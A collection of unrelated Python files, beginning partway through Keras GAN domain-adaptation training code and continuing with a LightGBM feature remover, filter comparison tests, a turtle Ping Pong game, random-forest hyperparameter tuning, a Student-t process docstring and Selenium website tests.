if GAN.disc_type == ("nclass_disc"):
current_labels_real = np.ones(GAN.batch_size)
current_labels_gen = np.zeros(GAN.batch_size)
##############
# Train the disc on gen-buffered samples and on current real samples
##############
disc_loss_real = GAN.discriminator_model.train_on_batch(X_dest_batch, current_labels_real)
GAN.img_buffer.add_to_buffer(gen_output, current_labels_gen, GAN.batch_size)
bufferImages, bufferLabels = GAN.img_buffer.get_from_buffer(GAN.batch_size)
disc_loss_gen = GAN.discriminator_model.train_on_batch(bufferImages, bufferLabels)
disc2_loss = GAN.discriminator2.train_on_batch(X_dest_batch,Y_dest_batch * 1.0) #GAN.lsmooth) #training the discriminator_classifier model
l_disc_real.appendleft(disc_loss_real)
l_disc_gen.appendleft(disc_loss_gen)
#Train the GENERATOR, it is the same on both AtoB and BtoA:
X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
if GAN.disc_type == "simple_disc":
gen_loss = GAN.DCGAN_model.train_on_batch([X_noise,X_source_batch], np.ones(GAN.batch_size))
elif GAN.disc_type == "nclass_disc":
gen_loss = GAN.DCGAN_model.train_on_batch([X_noise,X_source_batch], np.ones(GAN.batch_size))
class_p = GAN.GenClass_model.predict([X_noise,X_source_batch]) #AUTOLABELLING
idx = np.argmax(class_p, axis=1) #
virtual_labels = (idx[:, None]) == np.arange(GAN.n_classes) * 1.0 #
GenClass_loss = GAN.GenClass_model.train_on_batch([X_noise,X_source_batch], virtual_labels) #
l_GenClass.appendleft(GenClass_loss) #
l_gen.appendleft(gen_loss)
elif GAN.dir == 'AtoB':
for disc_it in range(disc_iters):
A_data_batch, A_labels_batch, B_data_batch, B_labels_batch = get_batch(A_data, A_labels, B_data, B_labels, GAN.batch_size)
X_source_batch = A_data_batch
Y_source_batch = A_labels_batch
X_dest_batch = B_data_batch
#Y_dest_batch = B_labels_batch
X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
gen_output = GAN.generator_model.predict([X_noise,X_source_batch])
#X_disc_real, X_disc_gen = get_disc_batch(X_dest_batch, GAN.generator_model, batch_counter, GAN.batch_size,
# GAN.noise_dim, X_source_batch, noise_scale=GAN.noise_scale)
if GAN.disc_type == "simple_disc":
current_labels_real = np.ones(GAN.batch_size)
current_labels_gen = np.zeros(GAN.batch_size)
if GAN.disc_type == ("nclass_disc"):
current_labels_real = np.ones(GAN.batch_size)
current_labels_gen = np.zeros(GAN.batch_size)
##############
#Train the disc on gen-buffered samples and on current real samples
##############
disc_loss_real = GAN.discriminator_model.train_on_batch(X_dest_batch, current_labels_real)
GAN.img_buffer.add_to_buffer(gen_output,current_labels_gen, GAN.batch_size)
bufferImages, bufferLabels = GAN.img_buffer.get_from_buffer(GAN.batch_size)
disc_loss_gen = GAN.discriminator_model.train_on_batch(bufferImages, bufferLabels)
disc2_loss = GAN.discriminator2.train_on_batch(gen_output,Y_source_batch * 1.0) #GAN.lsmooth) #training the discriminator_classifier model
l_disc_real.appendleft(disc_loss_real)
l_disc_gen.appendleft(disc_loss_gen)
#Train the GENERATOR, it is the same on both AtoB and BtoA:
X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
if GAN.disc_type == "simple_disc":
gen_loss = GAN.DCGAN_model.train_on_batch([X_noise,X_source_batch], np.ones(GAN.batch_size)) #TRYING SAME BATCH OF DISC
elif GAN.disc_type == "nclass_disc":
gen_loss = GAN.DCGAN_model.train_on_batch([X_noise,X_source_batch], np.ones(GAN.batch_size)) #TRYING SAME BATCH OF DISC
GenClass_loss = GAN.GenClass_model.train_on_batch([X_noise,X_source_batch], Y_source_batch,sample_weight=np.ones(GAN.batch_size)*class_weight)
#gen_loss = gen_loss[0]
l_gen.appendleft(gen_loss)
l_GenClass.appendleft(GenClass_loss)
return A_data_batch, A_labels_batch, B_data_batch, B_labels_batch
def train_class(GAN, l_class, A_data_batch, A_labels_batch):
if GAN.dir == 'AtoB':
X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
if GAN.data_aug:
x_dest_batch = GAN.generator_model.predict([X_noise,datagen.output(A_data_batch)])
else:
x_dest_batch = GAN.generator_model.predict([X_noise,A_data_batch])
# NO LABEL SMOOTHING!!!! inverted training w.r.t. to AtoB, because I
# have labels of A
class_loss = GAN.classificator_model.train_on_batch(x_dest_batch, A_labels_batch)
elif GAN.dir == 'BtoA':
class_loss = GAN.classificator_model.train_on_batch(A_data_batch, A_labels_batch)
l_class.appendleft(class_loss[0])
return l_class
def train_rec(GAN,rec1, rec2, A_data_batch, B_data_batch, l_rec1, l_rec2,rec_weight):
X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
X_noise2 = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
rec_loss = rec1.train_on_batch([X_noise, A_data_batch,X_noise2],A_data_batch,sample_weight=np.ones(GAN.batch_size)*rec_weight)
rec_loss2 = rec2.train_on_batch([X_noise, B_data_batch,X_noise2],B_data_batch,sample_weight=np.ones(GAN.batch_size)*rec_weight)
l_rec1.appendleft(rec_loss)
l_rec2.appendleft(rec_loss2)
return l_rec1, l_rec2
def train_recClass(GAN,recClass, A_data_batch, A_labels_batch, l_recClass, rec_weight):
X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
X_noise2 = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
recClass_loss = recClass.train_on_batch([X_noise, A_data_batch,X_noise2],A_labels_batch,sample_weight=np.ones(GAN.batch_size)*rec_weight)
l_recClass.appendleft(recClass_loss)
return l_recClass
def train_gen_zclass(generator_model, DCGAN_model, zclass_model, disc_type, deterministic, noise_dim, noise_scale, batch_size, l_gen, l_zclass, X_source, Y_source, n_classes):
X_gen = sample_noise(noise_scale, batch_size, noise_dim)
X_source_batch2, Y_source_batch2, idx_source_batch2 = next(
gen_batch(X_source, Y_source, batch_size))
if disc_type == "simple_disc":
gen_loss = DCGAN_model.train_on_batch([X_gen, X_source_batch2], np.ones(X_gen.shape[0])) # TRYING SAME BATCH OF DISC
elif disc_type == ("nclass_disc"):
#(disc_p, class_p) = DCGAN_model.predict_on_batch(X_source_batch2)
#idx = np.argmax(class_p, axis=1)
#virtual_labels = (idx[:, None] == np.arange(n_classes)) * 1
virtual_labels = np.zeros([GAN.batch_size, GAN.n_classes])
gen_loss = DCGAN_model.train_on_batch([X_gen, X_source_batch2], [np.ones(X_gen.shape[0]), virtual_labels]) # FIX :((
#gen_loss = gen_loss[0]
l_gen.appendleft(gen_loss)
if not deterministic:
zclass_loss = zclass_model.train_on_batch(
[X_gen, X_source_batch2], [X_gen])
else:
zclass_loss = 0.0
l_zclass.appendleft(zclass_loss)
return l_gen, l_zclass
def visualize_save_stuffs(GANs, progbar, gen_iterations, batch_counter, n_batch_per_epoch, l_disc_real1, l_disc_gen1, l_gen_loss1,
l_class_loss1, l_disc_real2, l_disc_gen2, l_gen_loss2,l_class_loss2, A_data, A_labels, B_data, B_labels,
start,e, l_rec1, l_rec2,l_GenClass1, l_GenClass2, l_recClass):
gen_iterations += 1
batch_counter += 1
image_dim_ordering = 'th'
progbar.add(GANs[0].batch_size, values=[("Loss_D_real1", np.mean(l_disc_real1)),
("Loss_D_gen1", np.mean(l_disc_gen1)),
("Loss_G1", np.mean(l_gen_loss1)),
("Loss_Classifier1",np.mean(l_class_loss1)),
("Loss_D_real2", np.mean(l_disc_real2)),
("Loss_D_gen2", np.mean(l_disc_gen2)),
("Loss_G2", np.mean(l_gen_loss2)),
("Loss_Classifier2",np.mean(l_class_loss2)),
("Loss_Rec1", np.mean(l_rec1)),
("Loss_Rec2", np.mean(l_rec2)),
("Loss_GenClass1", np.mean(l_GenClass1)),
("Loss_AutoLabel", np.mean(l_GenClass2)),
("Loss_RecClass", np.mean(l_recClass))
])
for GAN in GANs:
# plot images 1 times per epochs if GAN.dir == 'BtoA':
if GAN.dir == 'BtoA':
X_source=B_data
Y_source=B_labels
X_dest = A_data
Y_dest = A_labels
elif GAN.dir == 'AtoB':
X_source=A_data
Y_source=A_labels
X_dest = B_data
Y_dest = B_labels
if batch_counter == n_batch_per_epoch:
#if batch_counter % (n_batch_per_epoch) == 0:
X_source_batch_plot, Y_source_batch_plot, idx_source_plot = next(gen_batch(X_source, Y_source, batch_size=GAN.batch_size))
returned_idx = plot_generated_batch(X_dest, X_source, GAN.generator_model, GAN.noise_dim, image_dim_ordering, idx_source_plot,
batch_size=GAN.batch_size,different_idx=True, datagen=GAN.datagen, data_aug=GAN.data_aug)
print ("Dest labels:")
print (Y_dest[returned_idx].argmax(1))
print ("Source labels:")
print (Y_source_batch_plot.argmax(1))
print('\nEpoch %s, Time: %s' % (e + 1, time.time() - start))
else:
idx_source_plot = 0
Y_source_batch_plot = 0
#Save model weights (by default, every 5 epochs)
if batch_counter == n_batch_per_epoch:
save_model_weights(GAN.generator_model, GAN.discriminator_model,
GAN.DCGAN_model, e, GAN.name, GAN.classificator_model, discriminator2=GAN.discriminator2)
return batch_counter, gen_iterations
def pretrain_disc( GAN, A_data, A_labels,B_data, B_labels,class_weight, pretrain_iters=100, resume=False):
l_real = deque(10 * [0], 10)
l_gen = deque(10 * [0], 10)
l_genclass = deque(10 * [0], 10)
if not resume:
_, _, _, _ = train_gan(GAN, pretrain_iters, A_data, A_labels, B_data, B_labels, 1, l_real, l_gen,l_gen,l_genclass,class_weight)
print "Pretrain of discriminator finished."
else:
print "resumed previous training."
def testing_class_accuracy(GANs,classificator_model, generator_model, vis_samples, noise_dim, noise_scale, data, labels):
acc=[]
loss=[]
for GAN in GANs:
if GAN.dir == 'BtoA':
# testing accuracy of trained classifier
X_noise = sample_noise(GAN.noise_scale, vis_samples, GAN.noise_dim)
Xsource_dataset_mapped = GAN.generator_model.predict(
[X_noise, data[:vis_samples]], batch_size=1000)
true_labels = labels[:vis_samples]
p1 = GAN.classificator_model.predict(Xsource_dataset_mapped, batch_size=1000, verbose=1)
score1 = np.sum(np.argmax(true_labels,axis=1) == np.argmax(p1, axis=1)) / float(true_labels.shape[0])
print('\n Classifier Accuracy and loss on full target domain: %.2f%% ' %
((100 * score1)))
if GAN.dir == 'AtoB':
X_noise = sample_noise(GAN.noise_scale, vis_samples, GAN.noise_dim)
Xsource_dataset_mapped = data[:vis_samples]
true_labels = labels[:vis_samples]
p2 = GAN.classificator_model.predict(Xsource_dataset_mapped, batch_size=1000, verbose=1)
score2 = np.sum(np.argmax(true_labels,axis=1) == np.argmax(p2, axis=1)) / float(true_labels.shape[0])
print('\n Classifier Accuracy and loss on full target domain: %.2f%% ' %
((100 * score2)))
res = []
for x in np.arange(0, 1.1, 0.1):
res.append((x, np.sum(np.argmax(true_labels,axis=1) == np.argmax(p1*x + p2*(1-x), axis=1)) / float(true_labels.shape[0])))
for (x, score) in res:
print("\n Coeff: %f - score: %.2f" % (x, score*100))
def train(**kwargs):
"""
Train standard DCGAN model
args: **kwargs (dict) keyword arguments that specify the model hyperparameters
"""
# Roll out the parameters
generator = kwargs["generator"]
discriminator = kwargs["discriminator"]
dset = kwargs["dset"]
img_dim = kwargs["img_dim"]
nb_epoch = kwargs["nb_epoch"]
batch_size = kwargs["batch_size"]
n_batch_per_epoch = kwargs["n_batch_per_epoch"]
bn_mode = kwargs["bn_mode"]
noise_dim = kwargs["noise_dim"]
noise_scale = kwargs["noise_scale"]
lr_rec = kwargs["lr_D"]
opt_rec = kwargs["opt_rec"]
lr_G = kwargs["lr_G"]
lr_D = kwargs["lr_D"]
opt_D = kwargs["opt_D"]
opt_G = kwargs["opt_G"]
use_mbd = kwargs["use_mbd"]
image_dim_ordering = kwargs["image_dim_ordering"]
epoch_size = n_batch_per_epoch * batch_size
deterministic1 = kwargs["deterministic1"]
deterministic2 = kwargs["deterministic2"]
inject_noise = kwargs["inject_noise"]
model = kwargs["model"]
no_supertrain = kwargs["no_supertrain"]
pureGAN = kwargs["pureGAN"]
lsmooth = kwargs["lsmooth"]
disc_type = kwargs["disc_type"]
resume = kwargs["resume"]
name = kwargs["name"]
wd = kwargs["wd"]
history_size = kwargs["history_size"]
monsterClass = kwargs["monsterClass"]
data_aug = kwargs["data_aug"]
disc_iters = kwargs["disc_iterations"]
class_weight = kwargs["class_weight"]
reconst_w= kwargs["reconst_w"]
rec = kwargs["rec"]
reconstClass = kwargs["reconstClass"]
pretrained = kwargs["pretrained"]
print("\nExperiment parameters:")
for key in kwargs.keys():
print key, kwargs[key]
print("\n")
#####some extra parameters:
noise_dim = (noise_dim,)
name1 = name + '1'
name2 = name + '2'
# Setup environment (logging directory etc)
general_utils.setup_logging("DCGAN")
gen_iterations = 0
# Loading data
A_data, A_labels, B_data, B_labels, n_classes, img_A_dim, img_B_dim = load_data(img_dim, image_dim_ordering, dset)
test_data, test_labels = load_testset(img_dim, image_dim_ordering, dset)
if deterministic1 is None:
deterministic1 = False
if deterministic2 is None:
deterministic2 = False
opt_D1, opt_G1, opt_C1, opt_Z1, opt_rec = build_opt(opt_D, opt_G, lr_D, lr_G, lr_rec, opt_rec)
generator_model1, discriminator_model1,discriminator_class1, classificator_model1, DCGAN_model1, GenClass_model1, zclass_model1 = load_compile_models(noise_dim, img_A_dim, img_B_dim,
deterministic1, pureGAN, wd, 'mse', 'categorical_crossentropy', disc_type, n_classes, opt_D1, opt_G1, opt_C1, opt_Z1, suffix=None, pretrained=pretrained)
load_pretrained_weights(generator_model1, discriminator_model1,discriminator_class1, DCGAN_model1, name1, B_data, B_labels, noise_scale, classificator_model1, resume=resume)
img_buffer1, datagen1 = load_buffer_and_augmentation(history_size, batch_size, img_A_dim, n_classes)
GAN1=_GAN(generator_model1, discriminator_model1, discriminator_class1,DCGAN_model1,GenClass_model1,classificator_model1, batch_size, img_A_dim,img_B_dim, noise_dim, noise_scale,
lr_D, lr_G, deterministic1, inject_noise, model, lsmooth, img_buffer1, datagen1, disc_type, data_aug, n_classes, disc_iters,name1, dir='AtoB' )
pretrain_disc( GAN1, A_data,A_labels, B_data, B_labels,class_weight, pretrain_iters=500, resume=resume)
#####################
##### Setup GAN2
opt_D2, opt_G2, opt_C2, opt_Z2 = build_opt(opt_D, opt_G, lr_D, lr_G)
generator_model2, discriminator_model2, discriminator_class2, classificator_model2, DCGAN_model2, GenClass_model2, zclass_model2 = load_compile_models(noise_dim, img_B_dim, img_A_dim,
deterministic2, pureGAN, wd, 'mse', 'categorical_crossentropy', disc_type, n_classes, opt_D2, opt_G2, opt_C2, opt_Z2, suffix=True)
load_pretrained_weights(generator_model2, discriminator_model2,discriminator_class2, DCGAN_model2, name2, B_data, B_labels, noise_scale, classificator_model2, resume=resume)
img_buffer2, datagen2 = load_buffer_and_augmentation(history_size, batch_size, img_B_dim, n_classes)
gen_entropy2=None
GAN2=_GAN(generator_model2, discriminator_model2, discriminator_class2, DCGAN_model2,GenClass_model2,classificator_model2, batch_size, img_B_dim,img_A_dim, noise_dim, noise_scale,
lr_D, lr_G, deterministic2, inject_noise, model, lsmooth, img_buffer2, datagen2, disc_type, data_aug, n_classes, disc_iters, name2, dir='BtoA' )
pretrain_disc( GAN2, A_data,A_labels, B_data, B_labels,class_weight, pretrain_iters=500, resume=resume)
################
####Reconstruction losses between Gen1 and Gen2:
rec1, rec2, recClass = load_compile_reconstructions(generator_model1, generator_model2,noise_dim,img_A_dim,img_B_dim,opt_G,opt_rec, classificator_model2)
if resume:
testing_class_accuracy([GAN1,GAN2],GAN1.classificator_model, GAN1.generator_model,
test_data.shape[0], GAN1.noise_dim, GAN1.noise_scale, test_data, test_labels)
# if two_gans:
# GANs=[GAN1,GAN2]
# else:
# GANs=[GAN1]
################
##################
for e in range(1, nb_epoch + 1):
# Initialize progbar and batch counter
progbar = generic_utils.Progbar(epoch_size,interval=0.2)
batch_counter = 1
start = time.time()
while batch_counter < n_batch_per_epoch:
l_disc_real1, l_disc_gen1, l_gen1, l_z1, l_class1,l_rec1,l_GenClass1,_ = get_loss_list()
A_data_batch, A_labels_batch, B_data_batch, B_labels_batch = train_gan(GAN1, GAN1.disc_iters, A_data, A_labels, B_data, B_labels, batch_counter, l_disc_real1, l_disc_gen1, l_gen1,l_GenClass1, class_weight)
l_disc_real2, l_disc_gen2, l_gen2, l_z2, l_class2, l_rec2, l_GenClass2, l_recClass = get_loss_list()
A_data_batch, A_labels_batch, B_data_batch, B_labels_batch = train_gan(GAN2, GAN2.disc_iters, A_data, A_labels, B_data, B_labels, batch_counter, l_disc_real2, l_disc_gen2,l_gen2,l_GenClass2, class_weight)
if rec:
train_rec(GAN1, rec1, rec2, A_data_batch, B_data_batch,l_rec1, l_rec2,reconst_w) #BRINGING US TO L.A.? :)
if reconstClass > 0.0:
train_recClass(GAN1,recClass, A_data_batch, A_labels_batch, l_recClass, reconstClass)
l_class1 = train_class(GAN1, l_class1, A_data_batch, A_labels_batch)
l_class2 = train_class(GAN2, l_class2, A_data_batch, A_labels_batch)
batch_counter, gen_iterations = visualize_save_stuffs([GAN1,GAN2], progbar, gen_iterations, batch_counter, n_batch_per_epoch,
l_disc_real1, l_disc_gen1, l_gen1, l_class1, l_disc_real2, l_disc_gen2,
l_gen2, l_class2, A_data, A_labels, B_data, B_labels,start,e,l_rec1, l_rec2,
l_GenClass1, l_GenClass2, l_recClass)
testing_class_accuracy([GAN1,GAN2],GAN1.classificator_model, GAN1.generator_model,
test_data.shape[0], GAN1.noise_dim, GAN1.noise_scale, test_data, test_labels)
# testing_class_accuracy([GAN1],GAN1.classificator_model, GAN1.generator_model,
# 5000, GAN1.noise_dim, GAN1.noise_scale, B_data, B_labels)
|
from sklearn.base import BaseEstimator, TransformerMixin
import lightgbm as lgb
import numpy as np
import pandas as pd
class NonstationaryFeatureRemover(BaseEstimator, TransformerMixin):
def __init__(self, remove_count=None, remove_ratio=None):
if remove_count and remove_ratio:
raise Exception('remove_count and remove_ratio cannot be set simultaneously')
self.remove_count = remove_count
self.remove_ratio = remove_ratio
def fit(self, X, y=None):
X = self._validate_data(X)
model = lgb.LGBMRegressor(n_jobs=-1, random_state=1)
model.fit(X, np.arange(X.shape[0]))
importances = model.feature_importances_
if self.remove_count:
remove_count = self.remove_count
else:
remove_count = int(self.remove_ratio * X.shape[1])
features = list(range(X.shape[1]))
feature_imp = pd.DataFrame(zip(importances, features), columns=['value', 'feature'])
feature_imp = feature_imp.sort_values('value')
for i in range(X.shape[1] - remove_count, X.shape[1]):
features.remove(int(feature_imp['feature'].iloc[i]))
self.selected_features_ = np.array(features)
return self
def transform(self, X, y=None):
X = self._validate_data(X)
return X[:, self.selected_features_].copy()
def inverse_transform(self, X, y=None):
raise Exception('inverse_transform not implemented')
|
# %%
import multyscale
import RHS_filters
import numpy as np
import matplotlib.pyplot as plt
# %% RHS bank
rhs_bank = RHS_filters.filterbank()
# %% Parameters of image
shape = (1024, 1024) # filtershape in pixels
# visual extent, same convention as pyplot:
visextent = np.array([-0.5, 0.5, -0.5, 0.5]) * (1023 / 32)
# %% Create image coordinate system:
axish = np.linspace(visextent[0], visextent[1], shape[0])
axisv = np.linspace(visextent[2], visextent[3], shape[1])
(x, y) = np.meshgrid(axish, axisv)
# %% Circular Gaussian
def test_circular_Gaussian():
sigma1 = 2
sigmas = np.array([1, 1]) * sigma1
f = multyscale.filters.gaussian2d(x, y, (sigmas[0], sigmas[1]))
f = f / f.sum()
f_2 = RHS_filters.d2gauss(
shape[0], sigmas[0] * 32, shape[1], sigmas[0] * 32, 0
)
plt.subplot(2, 2, 1)
plt.imshow(f)
plt.subplot(2, 2, 2)
plt.imshow(f_2)
plt.subplot(2, 2, 3)
plt.plot(f[512, :])
plt.subplot(2, 2, 4)
plt.plot(f_2[512, :])
assert np.allclose(f, f_2)
# %% Elliptical Gaussian
def test_elliptical_Gaussian():
sigma1 = 2
orientation = 40
sigma2 = 2 * sigma1
sigmas = np.array([1, 1]) * np.array([sigma1, sigma2])
f = multyscale.filters.gaussian2d(
x, y, (sigmas[0], sigmas[1]), orientation=orientation
)
f = f / f.sum()
f_2 = RHS_filters.d2gauss(
shape[0], sigmas[0] * 32, shape[1], sigmas[1] * 32, orientation
)
plt.subplot(2, 2, 1)
plt.imshow(f)
plt.subplot(2, 2, 2)
plt.imshow(f_2)
plt.subplot(2, 2, 3)
plt.plot(f[512, :])
plt.subplot(2, 2, 4)
plt.plot(f_2[512, :])
assert np.allclose(f, f_2)
# %% ODOG
def test_ODOG():
orientation = 150
sigma3 = 2
sigmas = np.array([[1, 1], [1, 2]]) * sigma3
rhs_odog = RHS_filters.odog(
shape[0], shape[1], sigma3 * 32, orientation=orientation
)
multy_odog = multyscale.filters.odog(
x, y, sigmas, orientation=(orientation, orientation)
)
plt.subplot(2, 2, 1)
plt.imshow(rhs_odog)
plt.subplot(2, 2, 2)
plt.imshow(multy_odog)
plt.subplot(2, 2, 3)
plt.plot(rhs_odog[512, :])
plt.subplot(2, 2, 4)
plt.plot(multy_odog[512, :])
assert np.allclose(rhs_odog, multy_odog)
|
# A simple Ping Pong game using Python 3 Programming language and the module called turtle
#By Edna Sawe Kite
#Import the required modules
import turtle
import winsound
import flask
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/pong.py/')
def pong():
print('Start Game')
return 'PLAY'
if __name__ == '__main__':
app.run(debug=True)
#Create the game screen
windw = turtle.Screen()
windw.title("Ping Pong Game by Edna Sawe")
windw.bgcolor("green")
windw.setup(width=800, height=600)
windw.tracer(0)
#Create the score to count scores
score_right = 0
score_left = 0
#Create the left paddle of the game
paddle_left = turtle.Turtle()
paddle_left.speed(1)
paddle_left.shape("square")
paddle_left.shapesize(stretch_wid=5, stretch_len=1)
paddle_left.color("black")
paddle_left.penup()
paddle_left.goto(-350, 0)
#Create the right paddle of the game
paddle_right = turtle.Turtle()
paddle_right.speed(1)
paddle_right.shape("square")
paddle_right.shapesize(stretch_wid=5, stretch_len=1)
paddle_right.color("black")
paddle_right.penup()
paddle_right.goto(350, 0)
#Creating the white ball
ball = turtle.Turtle()
ball.speed(1)
ball.shape("circle")
ball.color("white")
ball.penup()
ball.goto(0, 0)
ball.dx = 0.5
ball.dy = 0.8
#Creating the pen to record players' scores
pen = turtle.Turtle()
pen.speed(1)
pen.shape("circle")
pen.color("white")
pen.penup()
pen.hideturtle()
pen.goto(0, 260)
pen.write("PLAYER A: 0 PLAYER B: 0", align="center", font=("Courier", 28, "normal"))
#Creating function to play the game
def paddle_left_up():
y = paddle_left.ycor()
y += 20
paddle_left.sety(y)
def paddle_left_down():
y = paddle_left.ycor()
y -= 20
paddle_left.sety(y)
def paddle_right_up():
y = paddle_right.ycor()
y += 20
paddle_right.sety(y)
def paddle_right_down():
y = paddle_right.ycor()
y -= 20
paddle_right.sety(y)
#Creating the keyboard bindings to use when playing the game
windw.listen()
windw.onkeypress(paddle_left_up, "w")
windw.onkeypress(paddle_left_down, "s")
windw.onkeypress(paddle_right_up, "Up")
windw.onkeypress(paddle_right_down, "Down")
#Create the main game looping function
while True:
windw.update()
#Moving the ball
ball.setx(ball.xcor() + ball.dx)
ball.sety(ball.ycor() + ball.dy)
#Checking the border on top, bottom, rigt, and left
if ball.ycor() > 290:
ball.sety(290)
ball.dy *= -1
winsound.PlaySound("bounce.wav", winsound.SND_ASYNC)
elif ball.ycor() < -290:
ball.sety(-290)
ball.dy *= -1
winsound.PlaySound("bounce.wav", winsound.SND_ASYNC)
if ball.xcor() > 350:
score_left += 1
pen.clear()
pen.write("PLAYER A: {} PLAYER B: {}".format(score_left, score_right), align="center", font=("Courier", 28, "normal"))
ball.goto(0, 0)
ball.dx *= -1
elif ball.xcor() < -350:
score_right += 1
pen.clear()
pen.write("PLAYER A: {} PLAYER B: {}".format(score_left, score_right), align="center", font=("Courier", 28, "normal"))
ball.goto(0, 0)
ball.dx *= -1
#Paddle and the ball collisions solution\
if ball.xcor() < -340 and ball.ycor() < paddle_left.ycor() + 50 and ball.ycor() > paddle_left.ycor() - 50:
ball.dx *= -1
winsound.PlaySound("bounce.wav", winsound.SND_ASYNC)
elif ball.xcor() > 340 and ball.ycor() < paddle_right.ycor() + 50 and ball.ycor() > paddle_right.ycor() - 50:
ball.dx *= -1
winsound.PlaySound("bounce.wav", winsound.SND_ASYNC)
|
from google.cloud import storage
import json
import logging
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
def complete_hp_tuning(x_train_part, y_train_part, project_id, bucket_name, num_iterations):
# perform hyperparameter tuning
best_accuracy = -1
for i in range(0, num_iterations):
# ramdom split for train and validation
x_train, x_test, y_train, y_test = train_test_split(x_train_part, y_train_part, test_size=0.2)
# randomly assign hyperparameters
n_estimators = np.random.randint(10, 1000)
max_depth = np.random.randint(10, 1000)
min_samples_split = np.random.randint(2, 10)
min_samples_leaf = np.random.randint(1, 10)
max_features = ['auto','sqrt','log2',None][np.random.randint(0, 3)]
# fit the model on the training set with the parameters
rf_model = RandomForestClassifier(n_estimators=n_estimators, max_depth=max_depth, min_samples_split=min_samples_split, min_samples_leaf=min_samples_leaf, max_features=max_features)
rf_model.fit(x_train, y_train)
# make predictions on the test set
y_pred = rf_model.predict(x_test)
# assess the accuracy
total_preds = 0
total_correct = 0
for j in range(0, y_pred.shape[0]):
total_preds += 1
if np.array_equal(y_pred[j], y_test.values[j]):
total_correct += 1
accuracy = (total_correct / total_preds)
# determine whether to update parameters
if accuracy > best_accuracy:
best_accuracy = accuracy
best_n_estimators = n_estimators
best_max_depth = max_depth
best_min_samples_split = min_samples_split
best_min_samples_leaf = min_samples_leaf
best_max_features = max_features
# create a dictionary with the results
best_params = {'n_estimators':best_n_estimators,
'max_depth':best_max_depth,
'min_samples_split':best_min_samples_split,
'min_samples_leaf':best_min_samples_leaf,
'max_features':best_max_features}
logging.info('Completed hp tuning interation {}, best accuracy {} with params {}'.format(str(i+1), str(best_accuracy), best_params))
# write parameters to disk
output = json.dumps(best_params)
f = open('best_params.json','w')
f.write(output)
f.close()
# upload to cloud storage
storage_client = storage.Client(project=project_id)
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob('best_params.json')
blob.upload_from_filename('best_params.json')
return best_params |
#
# author: Jungtaek Kim (jtkim@postech.ac.kr)
# last updated: December 29, 2020
#
"""These files are for implementing Student-:math:`t` process regression.
It is implemented, based on the following article:
(i) Rasmussen, C. E., & Williams, C. K. (2006). Gaussian Process
Regression for Machine Learning. MIT Press.
(ii) Shah, A., Wilson, A. G., & Ghahramani, Z. (2014). Student-t Processes
as Alternatives to Gaussian Processes. In Proceedings of the 17th
International Conference on Artificial Intelligence and Statistics
(pp. 877-885)."""
|
"""
tests.py
Automated tests that are written here are run with the manage.py test command.
Included is an automated Selenium test written by Jaimes Subroto.
"""
from django.test import TestCase
# Create your tests here.
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest, time, re
chromedriver_path = '<C:/YOUR/chromedriver.exe_path>'
class ChromePark(unittest.TestCase):
def setUp(self):
# self.driver = webdriver.Firefox()
self.driver = webdriver.Chrome(chromedriver_path)
self.driver.implicitly_wait(30)
self.base_url = "https://www.katalon.com/"
self.verificationErrors = []
self.accept_next_alert = True
def test_chrome_park(self):
driver = self.driver
driver.get("http://35.230.88.48/")
driver.find_element_by_name("q").clear()
driver.find_element_by_name("q").send_keys("head")
driver.find_element_by_name("q").send_keys(Keys.ENTER)
self.assertEqual("Heron's Head Park", driver.find_element_by_xpath("//div/div[2]/p/strong").text)
self.assertEqual("April 24, 2018, 9:52 a.m.", driver.find_element_by_xpath("//div/div[2]/p[2]/strong").text)
self.assertEqual("Bathroom", driver.find_element_by_xpath("//p[3]/strong").text)
self.assertEqual("Weird toilet signs", driver.find_element_by_xpath("//p[4]/strong").text)
self.assertEqual("Park: Heron's Head Park", driver.find_element_by_xpath("//div[2]/div[2]/p").text)
self.assertEqual("Date: April 24, 2018, 9:56 a.m.", driver.find_element_by_xpath("//div[2]/div[2]/p[2]").text)
self.assertEqual("Category: Medical Waste", driver.find_element_by_xpath("//div[2]/div[2]/p[3]").text)
self.assertEqual("Issue: Park is entirely giant pills", driver.find_element_by_xpath("//div[2]/div[2]/p[4]").text)
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
except NoSuchElementException as e: return False
return True
def is_alert_present(self):
try: self.driver.switch_to_alert()
except NoAlertPresentException as e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally: self.accept_next_alert = True
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
class ChromeInvalid(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome(chromedriver_path)
self.driver.implicitly_wait(30)
self.base_url = "https://www.katalon.com/"
self.verificationErrors = []
self.accept_next_alert = True
def test_chrome_invalid(self):
driver = self.driver
driver.get("http://35.230.88.48/")
driver.find_element_by_name("q").clear()
driver.find_element_by_name("q").send_keys("-1234")
driver.find_element_by_name("q").send_keys(Keys.ENTER)
self.assertEqual("Please enter alphanumeric characters only. Search either by zip code or park name.", driver.find_element_by_xpath("//p[3]").text)
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
except NoSuchElementException as e: return False
return True
def is_alert_present(self):
try: self.driver.switch_to_alert()
except NoAlertPresentException as e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
